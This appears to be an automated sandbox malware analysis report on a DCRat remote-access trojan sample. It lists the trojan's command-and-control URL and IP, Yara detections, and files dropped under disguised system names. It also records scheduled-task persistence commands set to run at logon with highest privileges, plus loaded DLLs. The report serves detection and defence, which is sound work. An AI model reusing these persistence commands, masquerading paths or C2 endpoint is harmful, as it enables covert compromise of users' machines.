            Source: QtLimbtNymPOHuXh.exe, 00000010.00000002.2394977882.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000010.00000002.2394977882.00000000027ED000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000010.00000002.2394977882.000000000273A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://78.24.221.196:443/destenyserver/serverWindows.php?vcQl7RBdY8Czx6C=DxNsqNS3rFgUQt95TPLp0dsPTC
            Source: QtLimbtNymPOHuXh.exe, 00000007.00000002.1819598720.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000007.00000002.1819598720.0000000003082000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://78.24.221.196:443/destenyserver/serverWindows.php?vggpOLXPYLvMf5H5IvGMGdLPHKjxIru=tNEyeb&2c1
            Source: QtLimbtNymPOHuXh.exe, 00000012.00000002.2635763645.00000000032DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://78.24.221.196GG
            Source: QtLimbtNymPOHuXh.exe, 00000010.00000002.2394977882.00000000026E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://78.24.221.196N
            Source: QtLimbtNymPOHuXh.exe, 00000007.00000002.1819598720.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000C.00000002.1900238365.00000000030E3000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000010.00000002.2394977882.00000000029C8000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000012.00000002.2635763645.00000000035B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://78.24.H
            Source: QtLimbtNymPOHuXh.exe, 0000000F.00000002.2144498609.0000000003434000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://78.24.HJc
            Source: QtLimbtNymPOHuXh.exe, 00000007.00000002.1819598720.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000C.00000002.1900238365.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000F.00000002.2144498609.0000000003171000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000010.00000002.2394977882.0000000002617000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000012.00000002.2635763645.0000000003217000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/tradeoffer/new/?partner=1050759327&token=rXa5DHlk
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeWindow created: window name: CLIPBRDWNDCLASS
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeWindow created: window name: CLIPBRDWNDCLASS
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeWindow created: window name: CLIPBRDWNDCLASS

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 7fGdoA6Inq.exe, type: SAMPLEMatched rule: DCRat payload Author: ditekSHen
            Source: 0.0.7fGdoA6Inq.exe.380000.0.unpack, type: UNPACKEDPEMatched rule: DCRat payload Author: ditekSHen
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe, type: DROPPEDMatched rule: DCRat payload Author: ditekSHen
            Source: C:\PerfLogs\wininit.exe, type: DROPPEDMatched rule: DCRat payload Author: ditekSHen
            Source: C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exe, type: DROPPEDMatched rule: DCRat payload Author: ditekSHen
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeFile created: C:\Windows\System32\Microsoft.Bluetooth.ServiceJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeFile created: C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exeJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeFile created: C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exe\:Zone.Identifier:$DATAJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeFile created: C:\Windows\System32\Microsoft.Bluetooth.Service\9e8d7a4ca61bd92aff00cc37a7a4d62a2cac998dJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeCode function: 0_2_00007FFD9B8A20100_2_00007FFD9B8A2010
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeCode function: 0_2_00007FFD9B8AFE820_2_00007FFD9B8AFE82
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeCode function: 0_2_00007FFD9B8AF0D60_2_00007FFD9B8AF0D6
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 7_2_00007FFD9BAC093E7_2_00007FFD9BAC093E
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 7_2_00007FFD9BAB20107_2_00007FFD9BAB2010
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 7_2_00007FFD9BAC4CEB7_2_00007FFD9BAC4CEB
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 7_2_00007FFD9BAC09747_2_00007FFD9BAC0974
            Source: C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exeCode function: 8_2_00007FFD9BAA20108_2_00007FFD9BAA2010
            Source: C:\PerfLogs\wininit.exeCode function: 9_2_00007FFD9BAC20109_2_00007FFD9BAC2010
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeCode function: 10_2_00007FFD9BAC201010_2_00007FFD9BAC2010
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 12_2_00007FFD9BAC201012_2_00007FFD9BAC2010
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 12_2_00007FFD9BACD80412_2_00007FFD9BACD804
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 15_2_00007FFD9BAC201015_2_00007FFD9BAC2010
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 15_2_00007FFD9BAD093E15_2_00007FFD9BAD093E
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 15_2_00007FFD9BAD097415_2_00007FFD9BAD0974
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 16_2_00007FFD9BAB201016_2_00007FFD9BAB2010
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 16_2_00007FFD9BAC0E5416_2_00007FFD9BAC0E54
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 18_2_00007FFD9BAC201018_2_00007FFD9BAC2010
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeCode function: 18_2_00007FFD9BACD80418_2_00007FFD9BACD804
            Source: 7fGdoA6Inq.exe, 00000000.00000000.1674236970.000000000062A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenametelescop.exe$ vs 7fGdoA6Inq.exe
            Source: 7fGdoA6Inq.exe, 00000000.00000002.1736543863.000000001B8E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs 7fGdoA6Inq.exe
            Source: 7fGdoA6Inq.exe, 00000000.00000002.1736543863.000000001B8E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs 7fGdoA6Inq.exe
            Source: 7fGdoA6Inq.exeBinary or memory string: OriginalFilenametelescop.exe$ vs 7fGdoA6Inq.exe
            Source: 7fGdoA6Inq.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 7fGdoA6Inq.exe, type: SAMPLEMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
            Source: 0.0.7fGdoA6Inq.exe.380000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe, type: DROPPEDMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
            Source: C:\PerfLogs\wininit.exe, type: DROPPEDMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
            Source: C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exe, type: DROPPEDMatched rule: MALWARE_Win_DCRat author = ditekSHen, description = DCRat payload
            Source: classification engineClassification label: mal100.troj.evad.winEXE@18/16@0/1
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeFile created: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\7fGdoA6Inq.exe.logJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7604:120:WilError_03
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeMutant created: \Sessions\1\BaseNamedObjects\a8e83276d80e5deb5e45080c8142f7c203b96267
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeFile created: C:\Users\user\AppData\Local\Temp\cBVY07R7fiJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\6PWFNNlUVO.bat"
            Source: 7fGdoA6Inq.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 7fGdoA6Inq.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 7fGdoA6Inq.exeReversingLabs: Detection: 87%
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeFile read: C:\Users\user\Desktop\7fGdoA6Inq.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\7fGdoA6Inq.exe "C:\Users\user\Desktop\7fGdoA6Inq.exe"
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "QtLimbtNymPOHuXh" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\PerfLogs\wininit.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\6PWFNNlUVO.bat"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
            Source: unknownProcess created: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe "C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe"
            Source: unknownProcess created: C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exe C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exe
            Source: unknownProcess created: C:\PerfLogs\wininit.exe C:\PerfLogs\wininit.exe
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\7fGdoA6Inq.exe "C:\Users\user\Desktop\7fGdoA6Inq.exe"
            Source: unknownProcess created: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe "C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe"
            Source: unknownProcess created: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe "C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe"
            Source: unknownProcess created: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe "C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe"
            Source: unknownProcess created: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe "C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe"
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\6PWFNNlUVO.bat" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\7fGdoA6Inq.exe "C:\Users\user\Desktop\7fGdoA6Inq.exe" Jump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\PerfLogs\wininit.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\PerfLogs\wininit.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\PerfLogs\wininit.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\PerfLogs\wininit.exeSection loaded: version.dllJump to behavior
            Source: C:\PerfLogs\wininit.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\PerfLogs\wininit.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\PerfLogs\wininit.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\PerfLogs\wininit.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\PerfLogs\wininit.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\PerfLogs\wininit.exeSection loaded: wldp.dllJump to behavior
            Source: C:\PerfLogs\wininit.exeSection loaded: profapi.dllJump to behavior
            Source: C:\PerfLogs\wininit.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\PerfLogs\wininit.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\PerfLogs\wininit.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\PerfLogs\wininit.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeSection loaded: rsaenh.dllJump to behavior
